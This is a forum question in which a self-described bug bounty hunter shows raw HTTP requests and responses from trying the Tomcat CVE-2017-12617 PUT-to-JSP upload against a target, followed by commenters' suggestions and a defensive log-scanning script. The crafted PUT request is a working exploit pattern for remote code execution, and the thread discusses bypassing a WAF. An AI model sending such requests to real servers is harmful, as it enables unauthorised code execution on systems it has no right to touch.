
I am a bug bounty hunter. While doing some research, I found a subdomain that is using Apache Tomcat. Speaking of Tomcat, there was a vulnerability found in 2017: CVE-2017-12617.

Any Apache Tomcat server with the PUT request method enabled will allow the attacker to create a JSP file on the server through a crafted request, which leads to RCE:

PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://vulnerable.com/public/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26

<% out.println("hello");%>

And after some testing, I found that the server had the PUT method enabled. But when I sent the exploit request, there was an error:

PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<% out.println("hello");%>




HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 389
Date: Fri, 17 Apr 2020 02:07:24 GMT
Connection: close

<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Apr 17 11:07:24 JST 2020</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>URLDecoder: Illegal hex characters in escape (%) pattern - For input string: &quot; o&quot;</div></body></html>

I found that the error is from the Java URLDecoder. The server may have decoded the content in the body of the request, but "% o" is not a valid URL character, so the error occurred. It proves that the server has handled the request; it might have worked, but it did not. Then I tried this:

PUT /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<%25 out.println("hello");%25>




HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->

<html>
<head>
  <title>VULNEARBLE</title>
...

It gave me back a 404 response. I have tried POST, but it just proves that there is something special about the PUT method:

POST /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

<% out.println("hello");%>




HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->

<html>
<head>
  <title>VULNEARBLE</title>
...

(The POST request does not even show any error or response.) I have checked the 1.jsp file, but it hasn't been created yet:

GET /1.jsp/ HTTP/1.1
Host: vulnerable.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: ...
If-Modified-Since: Thu, 09 Apr 2020 08:10:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 26




HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Fri, 17 Apr 2020 02:05:30 GMT
Connection: close
Content-Length: 1295

<!DOCTYPE html>
<!--
  ~ Copyright (c) 2018 Vulnerable Corporation. All rights reserved.
  ~ Vulnerable Corporation PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
  -->

<html>
<head>
  <title>VULNEARBLE</title>
...

Does anyone know what is happening and what I should do next?

  • Did you try encoding more of the payload? Did that give any results? – Raimonds Liepiņš Apr 17 '20 at 05:36
  • @RaimondsLiepiņš Which type of encoding? URL, base64, ...? – user232075 Apr 17 '20 at 11:41
  • Have you tried the Metasploit module or Python script for this CVE? – multithr3at3d Apr 17 '20 at 15:15
  • I haven't downloaded Metasploit yet, and I have tried the Python script, but it does not work. Do you think there is a difference between an automation script and a manual exploit? Absolutely not: the automation script just sends the original request that was published with the vulnerability, and only a manual exploit can bypass a WAF or something like that. I totally don't trust the exploit script. – user232075 Apr 19 '20 at 14:23
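As an added example (not part of the question or its comments), a defender-side log check: the Python below parses constructed Tomcat access-log lines in the common pattern and flags PUT/DELETE requests to JSP paths, the request shape shown in the question, separating attempts the server rejected (like the 500 and 404 responses above) from ones it accepted with a 2xx. The log format, the sample lines and the verdict names are assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)$'
)
WRITE_METHODS = {"PUT", "DELETE"}  # methods the DefaultServlet honours when readonly=false

# Constructed sample entries (assumed, not from the question's target); the first
# four mirror the request/response pairs shown in the question.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2020:02:07:24 +0000] "PUT /1.jsp/ HTTP/1.1" 500 389',
    '203.0.113.5 - - [17/Apr/2020:02:05:30 +0000] "PUT /1.jsp/ HTTP/1.1" 404 1295',
    '203.0.113.5 - - [17/Apr/2020:02:05:30 +0000] "POST /1.jsp/ HTTP/1.1" 404 1295',
    '203.0.113.5 - - [17/Apr/2020:02:05:31 +0000] "GET /1.jsp/ HTTP/1.1" 404 1295',
    '198.51.100.7 - - [17/Apr/2020:02:09:00 +0000] "PUT /docs/x.jsp/ HTTP/1.1" 201 -',
    '192.0.2.9 - - [17/Apr/2020:02:10:00 +0000] "PUT /api/items/42 HTTP/1.1" 204 -',
    '192.0.2.9 - - [17/Apr/2020:02:10:01 +0000] "GET /index.jsp HTTP/1.1" 200 5120',
]

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Fields of one common-format line, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry: Dict[str, str]) -> Optional[str]:
    """Verdict for a PUT/DELETE aimed at a JSP path, else None."""
    if entry["method"] not in WRITE_METHODS:
        return None
    # ".jsp" anywhere in the path catches "/1.jsp/" (the question's trailing-slash form) too.
    if ".jsp" not in entry["path"].lower():
        return None
    # 2xx means the write was accepted; the question's 500 and 404 mean it was not.
    status = int(entry["status"])
    return "jsp-write-accepted" if 200 <= status < 300 else "jsp-write-attempted"

def scan(lines: List[str]) -> List[Tuple[str, str, str, int, str]]:
    """(ip, method, path, status, verdict) for every flagged line."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        verdict = classify(entry) if entry else None
        if verdict:
            findings.append((entry["ip"], entry["method"], entry["path"],
                             int(entry["status"]), verdict))
    return findings
```

On the server side, the matching hardening is to keep the DefaultServlet's readonly init-param at its default of true (so PUT and DELETE are refused) and to run a Tomcat release that includes the fix for this CVE.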

0 Answers